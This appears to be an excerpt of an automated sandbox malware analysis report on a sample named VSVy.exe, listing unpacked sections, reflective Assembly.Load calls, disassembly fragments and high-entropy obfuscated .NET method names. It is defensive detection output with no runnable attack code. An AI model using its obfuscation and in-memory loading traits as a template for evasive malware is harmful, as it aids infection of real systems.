              Source: C:\Users\user\Desktop\VSVy.exeUnpacked PE file: 0.2.VSVy.exe.4a0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
              Source: C:\Users\user\Desktop\VSVy.exeUnpacked PE file: 0.2.VSVy.exe.4a0000.0.unpack
              Source: 0.2.VSVy.exe.4185da0.4.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.VSVy.exe.28a0000.1.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.cs.Net Code: PApoHnCCXQ System.Reflection.Assembly.Load(byte[])
              Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.cs.Net Code: PApoHnCCXQ System.Reflection.Assembly.Load(byte[])
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.cs.Net Code: PApoHnCCXQ System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0056CE44 push ecx; ret 0_2_0056CF4A
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0056CF8F push ecx; ret 0_2_0056CF98
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0056CF89 push ecx; retf 0_2_0056CF8C
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0056CF71 push ecx; retf 0_2_0056CF86
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0056CE66 push ecx; ret 0_2_0056CF4A
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_004A20BC push es; iretd 0_2_004A20BD
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0056CF60 push ecx; retf 0_2_0056CF62
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_004A20B3 push cs; ret 0_2_004A20BB
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_09578BF5 push 69C04589h; ret 0_2_09578BFB
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0957CA5E push CC095AA3h; iretd 0_2_0957CA75
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_0957BFD0 push CC095AA3h; iretd 0_2_0957CA75
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_095721F8 push 69C04589h; ret 0_2_095721FE
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 0_2_097736CC push ebx; iretd 0_2_097736DA
              Source: C:\Users\user\Desktop\VSVy.exeCode function: 10_2_068E8D3D push es; ret 10_2_068E8D44
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_049D6063 pushfd ; iretd 11_2_049D60BE
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 11_2_04FE79C7 pushfd ; iretd 11_2_04FE79C9
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeCode function: 16_2_02D99C30 push esp; retf 02E0h16_2_02D99D55
              Source: VSVy.exeStatic PE information: section name: .text entropy: 7.6852612472384925
              Source: gJfOOh.exe.0.drStatic PE information: section name: .text entropy: 7.6852612472384925
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, eUuEe4OrV40VRtn7Np.csHigh entropy of concatenated method names: 'hhMIpnwKYE', 'qqTIwZ6ETF', 'zYbICywveu', 'wbuIOtS61d', 'DwmIvx8pIM', 'wNKI8fkvei', 'qNqIGTVBCO', 'gk7I26duHN', 'ueWIatT680', 'GtpIR3kdEc'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, gcOGR2CVZ5gWDXuqnV.csHigh entropy of concatenated method names: 'JtKjTEJHfo', 'gatj5QdH2S', 'G7KjLIouVo', 'hcyjdafyKF', 'BL6jDC6HJq', 'i9GjgfR4Bw', 'Df3j1Hn7Ry', 'rtojE13tvP', 'hsYjVrRFXi', 'I6FjKcgVPX'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, lurOhwghi3TY9aVipT.csHigh entropy of concatenated method names: 'b9YGEV9Axw', 'KuoGKcAWRy', 'qGQ2kh3Zck', 'wLG2r9ao1a', 'CTKGPtnE0Z', 'WvgGmLbgOf', 'v9AGiZ8v6Z', 'VrYGTxCpgk', 'tnJG5Z6MF6', 'nTGGLPTjIh'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, ac6w5O1eEbbLSHhbcg.csHigh entropy of concatenated method names: 'q5KavWlCbJ', 'W21aGt4oQk', 'uufaa656b8', 'lvqa93DraN', 'FDQatTWb9U', 'z7EahUBJ4R', 'Dispose', 'dHd2UvUO3e', 'SsB2jPQOnV', 'JN22INeixm'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, d9mYAbiG8Tuy8A3ufE.csHigh entropy of concatenated method names: 'CkafC174wm', 'PsIfOVacWy', 'rxJfntClVc', 'QDBfJoQQb7', 'uAPfe527po', 'KjBfSXailh', 'J1vfYpGojP', 'GdZfsDZuj8', 'LSgfFdRHS9', 'IYBfP2Hnnc'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, yeorbijDlEpM0W5tPK.csHigh entropy of concatenated method names: 'Dispose', 'hbLrVSHhbc', 'pNr6JkmuH7', 'yiNAHWbeOx', 'V8brKL0rlp', 'Qdtrz0qUTD', 'ProcessDialogKey', 'wfI6k4bNq7', 'JrG6r1iAtt', 'YXF66RwTNf'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, YYVFxextRxUwTnW85c.csHigh entropy of concatenated method names: 'uBHbyg9CiB', 'JJgbZ3Ey62', 'i3UI3ooS1l', 'WQnIeNXKW9', 'ob7ISVeqnw', 'aNWIMFqt6D', 'LV9IYTyT77', 'WfIIsIcM3G', 'erZIA3h5xQ', 'OWeIFiArVY'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, RkPOokr6VwmXIDrvXG0.csHigh entropy of concatenated method names: 'ToString', 'fgR9C2l0XB', 'GeI9OTYph8', 'r0x9ximCa0', 'gBe9nCD1MY', 'yeV9J76ISo', 'Uvc93Eyp05', 'rU29eTYiPK', 'JgmE5eMbrVxMQiqmuQX', 'Kee6kqM8hD2OEmJEDvd'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, zPWXsvrkcqmULf5tUA8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oWbRPP2xUL', 'd5bRm2CgyE', 'WxLRiuhuEb', 'rCNRTM3vyS', 'AmaR501ca0', 'UdZRLfPUl1', 'ML8Rd2FeCT'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, g4bNq7VSrG1iAttKXF.csHigh entropy of concatenated method names: 'svuansxNWr', 'IMmaJXH9tT', 'cFBa3NUF03', 'GeUaefLjlC', 'DjUaS89LIc', 'kFpaMBrZ5C', 'VtdaYkyfPw', 'hvXasN1NW6', 'aDJaAua1Jj', 'TIfaF2rS10'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, Ym7FTqrrMHR6DHoFZ8m.csHigh entropy of concatenated method names: 'qDLRKGn7HK', 'sedRzGIIQA', 'cCn9kN2jbS', 'xIg9rYnQhT', 'hIp967R24t', 'ieb9B7sFdy', 'S5C9of0ZxS', 'pjx9X7JbIT', 'tSw9UXBfZb', 'Yme9joHOuy'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, OARC1yL0uWy4BH6F7h.csHigh entropy of concatenated method names: 'ToString', 'TSX8PUuDrc', 'GPU8JIt8d2', 'w8b83YRbkx', 'b4X8e646oP', 'nFm8SKsiCQ', 'pDH8M9aHQa', 'LaC8YaDWBf', 'iNh8s90H3l', 'WhS8AvJGDx'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, qXKZM5zrBxYMqPeTWi.csHigh entropy of concatenated method names: 'jheRwR8pxG', 'vT9RCNUfpG', 'j9BRONsGfF', 'ycXRnF6FTK', 'U5yRJoNqN5', 'Xr9RekXYI3', 'GOHRSQjZvX', 'mHvRhTjryt', 'sJlRc63jiL', 'R2iRWsANci'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, oMDSaYYRMNNMy5VfMZ.csHigh entropy of concatenated method names: 'gxkNUJrv5e', 'RR4NIYLEwh', 'TUoNQI1MCB', 'BrOQKc6bxD', 'wOMQzB7j0w', 'OKqNkYQswx', 'bhxNrAGdvT', 'FW7N69FVxX', 'fUANBDgm03', 'EWvNoQqPsH'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.csHigh entropy of concatenated method names: 'XRnBXYWolf', 'eQoBU6xRCZ', 'OqrBjXEUSB', 'FmABIg7XsE', 'yJEBbFpYvA', 'CvvBQdyxnO', 'CpVBNABHAE', 'vhxBqGEQrF', 'yYSB7Tacix', 'zdYBuKv79C'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, wQSAsG6pNOb7pFtqdn.csHigh entropy of concatenated method names: 'D1dHVDnQV', 'YD2pDdOmN', 'omtw7oVsU', 'AMpZMw15q', 'uSWOgQnb1', 'r6cxuUbXu', 'EYodckNsGBEkaMyduu', 'zj9CmaJiU23Ai36Zno', 'tjH21uJga', 'XinRpqAVq'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, twTNfiKb8tBU2cUUal.csHigh entropy of concatenated method names: 'AyURIxu4AN', 'VJcRbkgHZ3', 'g87RQEbo3a', 'rtjRNOY72Q', 'TDdRae9AXj', 'JhsRqWSaco', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, JkguQeIVDOPyJdc7Du.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F7W6VRWgSX', 'UQ96K6Q2gi', 'QVH6zCFT8x', 'gQ7BkXrgA3', 'vCbBrX5kWY', 'fqBB6ElgDX', 'Je9BBGNZvy', 'i4w2qb6bwGlc2l3PWce'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, ApGDyorooBMAocqJ6OU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pd40aWLTZM', 'knF0RFsv1o', 'Kie09XbiMw', 'vNY00V7w8j', 'QnF0tmkMFf', 'PDB0llHdgK', 'Ogc0hkK4SM'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, lC4I8sdOAG6ZfqykOA.csHigh entropy of concatenated method names: 'ywoGuIa29p', 'tCJG4g3WCK', 'ToString', 'CpuGUQIJtX', 'L3aGjLNhbF', 'hwlGIuHMty', 'kfwGbARiHy', 'ltuGQSinqY', 'i0sGNntXM8', 'khHGqqMy2O'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, B5DSDenORf7OfAgO3T.csHigh entropy of concatenated method names: 'Jv5QXZ3s38', 'mSIQjk60OQ', 'bmIQbtK4cD', 'wyBQNkYf8R', 'dtvQqAN5He', 'w52bDkc9TA', 'og8bgwSW8t', 'lHlb1gqTik', 'RvrbEw0tE4', 'FIbbVBkBCS'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, JwB9hNAUuhRD4qMKMu.csHigh entropy of concatenated method names: 'okJNcmfEAH', 'qiINWckl4x', 'n3LNHmmtHZ', 'WDsNpTxkBh', 'AngNytucUD', 'xouNwr4CNK', 'gF1NZPnWGg', 'k7dNCsW1Xq', 'iR1NOKicmE', 'JJFNxYecnH'
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, Rw6U9HoytPh3C58fNu.csHigh entropy of concatenated method names: 'WTjrNcOGR2', 'XZ5rqgWDXu', 'nrVru40VRt', 'G7Nr4pKYVF', 'FW8rv5cy5D', 'JDer8ORf7O', 'aSoZS0mgjWVQbLDGSf', 'iaaqv4jEsWpdtjsMII', 'h32rrFQR7d', 'N6RrBwGcRi'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, eUuEe4OrV40VRtn7Np.csHigh entropy of concatenated method names: 'hhMIpnwKYE', 'qqTIwZ6ETF', 'zYbICywveu', 'wbuIOtS61d', 'DwmIvx8pIM', 'wNKI8fkvei', 'qNqIGTVBCO', 'gk7I26duHN', 'ueWIatT680', 'GtpIR3kdEc'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, gcOGR2CVZ5gWDXuqnV.csHigh entropy of concatenated method names: 'JtKjTEJHfo', 'gatj5QdH2S', 'G7KjLIouVo', 'hcyjdafyKF', 'BL6jDC6HJq', 'i9GjgfR4Bw', 'Df3j1Hn7Ry', 'rtojE13tvP', 'hsYjVrRFXi', 'I6FjKcgVPX'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, lurOhwghi3TY9aVipT.csHigh entropy of concatenated method names: 'b9YGEV9Axw', 'KuoGKcAWRy', 'qGQ2kh3Zck', 'wLG2r9ao1a', 'CTKGPtnE0Z', 'WvgGmLbgOf', 'v9AGiZ8v6Z', 'VrYGTxCpgk', 'tnJG5Z6MF6', 'nTGGLPTjIh'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, ac6w5O1eEbbLSHhbcg.csHigh entropy of concatenated method names: 'q5KavWlCbJ', 'W21aGt4oQk', 'uufaa656b8', 'lvqa93DraN', 'FDQatTWb9U', 'z7EahUBJ4R', 'Dispose', 'dHd2UvUO3e', 'SsB2jPQOnV', 'JN22INeixm'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, d9mYAbiG8Tuy8A3ufE.csHigh entropy of concatenated method names: 'CkafC174wm', 'PsIfOVacWy', 'rxJfntClVc', 'QDBfJoQQb7', 'uAPfe527po', 'KjBfSXailh', 'J1vfYpGojP', 'GdZfsDZuj8', 'LSgfFdRHS9', 'IYBfP2Hnnc'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, yeorbijDlEpM0W5tPK.csHigh entropy of concatenated method names: 'Dispose', 'hbLrVSHhbc', 'pNr6JkmuH7', 'yiNAHWbeOx', 'V8brKL0rlp', 'Qdtrz0qUTD', 'ProcessDialogKey', 'wfI6k4bNq7', 'JrG6r1iAtt', 'YXF66RwTNf'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, YYVFxextRxUwTnW85c.csHigh entropy of concatenated method names: 'uBHbyg9CiB', 'JJgbZ3Ey62', 'i3UI3ooS1l', 'WQnIeNXKW9', 'ob7ISVeqnw', 'aNWIMFqt6D', 'LV9IYTyT77', 'WfIIsIcM3G', 'erZIA3h5xQ', 'OWeIFiArVY'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, RkPOokr6VwmXIDrvXG0.csHigh entropy of concatenated method names: 'ToString', 'fgR9C2l0XB', 'GeI9OTYph8', 'r0x9ximCa0', 'gBe9nCD1MY', 'yeV9J76ISo', 'Uvc93Eyp05', 'rU29eTYiPK', 'JgmE5eMbrVxMQiqmuQX', 'Kee6kqM8hD2OEmJEDvd'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, zPWXsvrkcqmULf5tUA8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oWbRPP2xUL', 'd5bRm2CgyE', 'WxLRiuhuEb', 'rCNRTM3vyS', 'AmaR501ca0', 'UdZRLfPUl1', 'ML8Rd2FeCT'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, g4bNq7VSrG1iAttKXF.csHigh entropy of concatenated method names: 'svuansxNWr', 'IMmaJXH9tT', 'cFBa3NUF03', 'GeUaefLjlC', 'DjUaS89LIc', 'kFpaMBrZ5C', 'VtdaYkyfPw', 'hvXasN1NW6', 'aDJaAua1Jj', 'TIfaF2rS10'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, Ym7FTqrrMHR6DHoFZ8m.csHigh entropy of concatenated method names: 'qDLRKGn7HK', 'sedRzGIIQA', 'cCn9kN2jbS', 'xIg9rYnQhT', 'hIp967R24t', 'ieb9B7sFdy', 'S5C9of0ZxS', 'pjx9X7JbIT', 'tSw9UXBfZb', 'Yme9joHOuy'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, OARC1yL0uWy4BH6F7h.csHigh entropy of concatenated method names: 'ToString', 'TSX8PUuDrc', 'GPU8JIt8d2', 'w8b83YRbkx', 'b4X8e646oP', 'nFm8SKsiCQ', 'pDH8M9aHQa', 'LaC8YaDWBf', 'iNh8s90H3l', 'WhS8AvJGDx'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, qXKZM5zrBxYMqPeTWi.csHigh entropy of concatenated method names: 'jheRwR8pxG', 'vT9RCNUfpG', 'j9BRONsGfF', 'ycXRnF6FTK', 'U5yRJoNqN5', 'Xr9RekXYI3', 'GOHRSQjZvX', 'mHvRhTjryt', 'sJlRc63jiL', 'R2iRWsANci'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, oMDSaYYRMNNMy5VfMZ.csHigh entropy of concatenated method names: 'gxkNUJrv5e', 'RR4NIYLEwh', 'TUoNQI1MCB', 'BrOQKc6bxD', 'wOMQzB7j0w', 'OKqNkYQswx', 'bhxNrAGdvT', 'FW7N69FVxX', 'fUANBDgm03', 'EWvNoQqPsH'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.csHigh entropy of concatenated method names: 'XRnBXYWolf', 'eQoBU6xRCZ', 'OqrBjXEUSB', 'FmABIg7XsE', 'yJEBbFpYvA', 'CvvBQdyxnO', 'CpVBNABHAE', 'vhxBqGEQrF', 'yYSB7Tacix', 'zdYBuKv79C'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, wQSAsG6pNOb7pFtqdn.csHigh entropy of concatenated method names: 'D1dHVDnQV', 'YD2pDdOmN', 'omtw7oVsU', 'AMpZMw15q', 'uSWOgQnb1', 'r6cxuUbXu', 'EYodckNsGBEkaMyduu', 'zj9CmaJiU23Ai36Zno', 'tjH21uJga', 'XinRpqAVq'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, twTNfiKb8tBU2cUUal.csHigh entropy of concatenated method names: 'AyURIxu4AN', 'VJcRbkgHZ3', 'g87RQEbo3a', 'rtjRNOY72Q', 'TDdRae9AXj', 'JhsRqWSaco', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, JkguQeIVDOPyJdc7Du.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F7W6VRWgSX', 'UQ96K6Q2gi', 'QVH6zCFT8x', 'gQ7BkXrgA3', 'vCbBrX5kWY', 'fqBB6ElgDX', 'Je9BBGNZvy', 'i4w2qb6bwGlc2l3PWce'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, ApGDyorooBMAocqJ6OU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pd40aWLTZM', 'knF0RFsv1o', 'Kie09XbiMw', 'vNY00V7w8j', 'QnF0tmkMFf', 'PDB0llHdgK', 'Ogc0hkK4SM'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, lC4I8sdOAG6ZfqykOA.csHigh entropy of concatenated method names: 'ywoGuIa29p', 'tCJG4g3WCK', 'ToString', 'CpuGUQIJtX', 'L3aGjLNhbF', 'hwlGIuHMty', 'kfwGbARiHy', 'ltuGQSinqY', 'i0sGNntXM8', 'khHGqqMy2O'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, B5DSDenORf7OfAgO3T.csHigh entropy of concatenated method names: 'Jv5QXZ3s38', 'mSIQjk60OQ', 'bmIQbtK4cD', 'wyBQNkYf8R', 'dtvQqAN5He', 'w52bDkc9TA', 'og8bgwSW8t', 'lHlb1gqTik', 'RvrbEw0tE4', 'FIbbVBkBCS'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, JwB9hNAUuhRD4qMKMu.csHigh entropy of concatenated method names: 'okJNcmfEAH', 'qiINWckl4x', 'n3LNHmmtHZ', 'WDsNpTxkBh', 'AngNytucUD', 'xouNwr4CNK', 'gF1NZPnWGg', 'k7dNCsW1Xq', 'iR1NOKicmE', 'JJFNxYecnH'
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, Rw6U9HoytPh3C58fNu.csHigh entropy of concatenated method names: 'WTjrNcOGR2', 'XZ5rqgWDXu', 'nrVru40VRt', 'G7Nr4pKYVF', 'FW8rv5cy5D', 'JDer8ORf7O', 'aSoZS0mgjWVQbLDGSf', 'iaaqv4jEsWpdtjsMII', 'h32rrFQR7d', 'N6RrBwGcRi'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, eUuEe4OrV40VRtn7Np.csHigh entropy of concatenated method names: 'hhMIpnwKYE', 'qqTIwZ6ETF', 'zYbICywveu', 'wbuIOtS61d', 'DwmIvx8pIM', 'wNKI8fkvei', 'qNqIGTVBCO', 'gk7I26duHN', 'ueWIatT680', 'GtpIR3kdEc'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, gcOGR2CVZ5gWDXuqnV.csHigh entropy of concatenated method names: 'JtKjTEJHfo', 'gatj5QdH2S', 'G7KjLIouVo', 'hcyjdafyKF', 'BL6jDC6HJq', 'i9GjgfR4Bw', 'Df3j1Hn7Ry', 'rtojE13tvP', 'hsYjVrRFXi', 'I6FjKcgVPX'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, lurOhwghi3TY9aVipT.csHigh entropy of concatenated method names: 'b9YGEV9Axw', 'KuoGKcAWRy', 'qGQ2kh3Zck', 'wLG2r9ao1a', 'CTKGPtnE0Z', 'WvgGmLbgOf', 'v9AGiZ8v6Z', 'VrYGTxCpgk', 'tnJG5Z6MF6', 'nTGGLPTjIh'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, ac6w5O1eEbbLSHhbcg.csHigh entropy of concatenated method names: 'q5KavWlCbJ', 'W21aGt4oQk', 'uufaa656b8', 'lvqa93DraN', 'FDQatTWb9U', 'z7EahUBJ4R', 'Dispose', 'dHd2UvUO3e', 'SsB2jPQOnV', 'JN22INeixm'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, d9mYAbiG8Tuy8A3ufE.csHigh entropy of concatenated method names: 'CkafC174wm', 'PsIfOVacWy', 'rxJfntClVc', 'QDBfJoQQb7', 'uAPfe527po', 'KjBfSXailh', 'J1vfYpGojP', 'GdZfsDZuj8', 'LSgfFdRHS9', 'IYBfP2Hnnc'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, yeorbijDlEpM0W5tPK.csHigh entropy of concatenated method names: 'Dispose', 'hbLrVSHhbc', 'pNr6JkmuH7', 'yiNAHWbeOx', 'V8brKL0rlp', 'Qdtrz0qUTD', 'ProcessDialogKey', 'wfI6k4bNq7', 'JrG6r1iAtt', 'YXF66RwTNf'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, YYVFxextRxUwTnW85c.csHigh entropy of concatenated method names: 'uBHbyg9CiB', 'JJgbZ3Ey62', 'i3UI3ooS1l', 'WQnIeNXKW9', 'ob7ISVeqnw', 'aNWIMFqt6D', 'LV9IYTyT77', 'WfIIsIcM3G', 'erZIA3h5xQ', 'OWeIFiArVY'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, RkPOokr6VwmXIDrvXG0.csHigh entropy of concatenated method names: 'ToString', 'fgR9C2l0XB', 'GeI9OTYph8', 'r0x9ximCa0', 'gBe9nCD1MY', 'yeV9J76ISo', 'Uvc93Eyp05', 'rU29eTYiPK', 'JgmE5eMbrVxMQiqmuQX', 'Kee6kqM8hD2OEmJEDvd'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, zPWXsvrkcqmULf5tUA8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oWbRPP2xUL', 'd5bRm2CgyE', 'WxLRiuhuEb', 'rCNRTM3vyS', 'AmaR501ca0', 'UdZRLfPUl1', 'ML8Rd2FeCT'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, g4bNq7VSrG1iAttKXF.csHigh entropy of concatenated method names: 'svuansxNWr', 'IMmaJXH9tT', 'cFBa3NUF03', 'GeUaefLjlC', 'DjUaS89LIc', 'kFpaMBrZ5C', 'VtdaYkyfPw', 'hvXasN1NW6', 'aDJaAua1Jj', 'TIfaF2rS10'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, Ym7FTqrrMHR6DHoFZ8m.csHigh entropy of concatenated method names: 'qDLRKGn7HK', 'sedRzGIIQA', 'cCn9kN2jbS', 'xIg9rYnQhT', 'hIp967R24t', 'ieb9B7sFdy', 'S5C9of0ZxS', 'pjx9X7JbIT', 'tSw9UXBfZb', 'Yme9joHOuy'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, OARC1yL0uWy4BH6F7h.csHigh entropy of concatenated method names: 'ToString', 'TSX8PUuDrc', 'GPU8JIt8d2', 'w8b83YRbkx', 'b4X8e646oP', 'nFm8SKsiCQ', 'pDH8M9aHQa', 'LaC8YaDWBf', 'iNh8s90H3l', 'WhS8AvJGDx'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, qXKZM5zrBxYMqPeTWi.csHigh entropy of concatenated method names: 'jheRwR8pxG', 'vT9RCNUfpG', 'j9BRONsGfF', 'ycXRnF6FTK', 'U5yRJoNqN5', 'Xr9RekXYI3', 'GOHRSQjZvX', 'mHvRhTjryt', 'sJlRc63jiL', 'R2iRWsANci'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, oMDSaYYRMNNMy5VfMZ.csHigh entropy of concatenated method names: 'gxkNUJrv5e', 'RR4NIYLEwh', 'TUoNQI1MCB', 'BrOQKc6bxD', 'wOMQzB7j0w', 'OKqNkYQswx', 'bhxNrAGdvT', 'FW7N69FVxX', 'fUANBDgm03', 'EWvNoQqPsH'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.csHigh entropy of concatenated method names: 'XRnBXYWolf', 'eQoBU6xRCZ', 'OqrBjXEUSB', 'FmABIg7XsE', 'yJEBbFpYvA', 'CvvBQdyxnO', 'CpVBNABHAE', 'vhxBqGEQrF', 'yYSB7Tacix', 'zdYBuKv79C'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, wQSAsG6pNOb7pFtqdn.csHigh entropy of concatenated method names: 'D1dHVDnQV', 'YD2pDdOmN', 'omtw7oVsU', 'AMpZMw15q', 'uSWOgQnb1', 'r6cxuUbXu', 'EYodckNsGBEkaMyduu', 'zj9CmaJiU23Ai36Zno', 'tjH21uJga', 'XinRpqAVq'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, twTNfiKb8tBU2cUUal.csHigh entropy of concatenated method names: 'AyURIxu4AN', 'VJcRbkgHZ3', 'g87RQEbo3a', 'rtjRNOY72Q', 'TDdRae9AXj', 'JhsRqWSaco', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, JkguQeIVDOPyJdc7Du.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'F7W6VRWgSX', 'UQ96K6Q2gi', 'QVH6zCFT8x', 'gQ7BkXrgA3', 'vCbBrX5kWY', 'fqBB6ElgDX', 'Je9BBGNZvy', 'i4w2qb6bwGlc2l3PWce'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, ApGDyorooBMAocqJ6OU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Pd40aWLTZM', 'knF0RFsv1o', 'Kie09XbiMw', 'vNY00V7w8j', 'QnF0tmkMFf', 'PDB0llHdgK', 'Ogc0hkK4SM'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, lC4I8sdOAG6ZfqykOA.csHigh entropy of concatenated method names: 'ywoGuIa29p', 'tCJG4g3WCK', 'ToString', 'CpuGUQIJtX', 'L3aGjLNhbF', 'hwlGIuHMty', 'kfwGbARiHy', 'ltuGQSinqY', 'i0sGNntXM8', 'khHGqqMy2O'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, B5DSDenORf7OfAgO3T.csHigh entropy of concatenated method names: 'Jv5QXZ3s38', 'mSIQjk60OQ', 'bmIQbtK4cD', 'wyBQNkYf8R', 'dtvQqAN5He', 'w52bDkc9TA', 'og8bgwSW8t', 'lHlb1gqTik', 'RvrbEw0tE4', 'FIbbVBkBCS'
              Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, JwB9hNAUuhRD4qMKMu.csHigh entropy of concatenated method names: 'okJNcmfEAH', 'qiINWckl4x', 'n3LNHmmtHZ', 'WDsNpTxkBh', 'AngNytucUD', 'xouNwr4CNK', 'gF1NZPnWGg', 'k7dNCsW1Xq', 'iR1NOKicmE', 'JJFNxYecnH'
